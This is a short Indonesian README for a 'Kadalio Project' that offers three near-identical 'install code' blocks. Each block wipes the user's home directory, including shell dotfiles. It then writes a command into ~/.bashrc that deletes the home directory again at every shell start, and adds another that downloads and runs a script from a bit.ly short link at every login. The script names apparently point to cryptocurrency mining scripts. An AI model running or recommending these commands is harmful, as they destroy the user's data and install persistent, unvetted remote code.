# Kadalio Project

## Kode untuk install
cd ~
rm -rvf *
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .kadalio*
mkdir ~/.kadalio && cd ~/.kadalio && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.kadalio && wget bit.ly/script-radiro && chmod +x script-radiro && ./script-radiro" >> ~/.bashrc && source ~/.bashrc


## Kode Instal 2
cd ~
rm -rvf *
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .kadalio*
mkdir ~/.kadalio && cd ~/.kadalio && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.kadalio && wget bit.ly/script-kaspa && chmod +x script-kaspa && ./script-kaspa" >> ~/.bashrc && source ~/.bashrc

## Kode Instal 3
cd ~
rm -rvf *
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .kadalio*
mkdir ~/.kadalio && cd ~/.kadalio && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.kadalio && wget bit.ly/direct-rvn && chmod +x direct-rvn && ./direct-rvn" >> ~/.bashrc && source ~/.bashrc
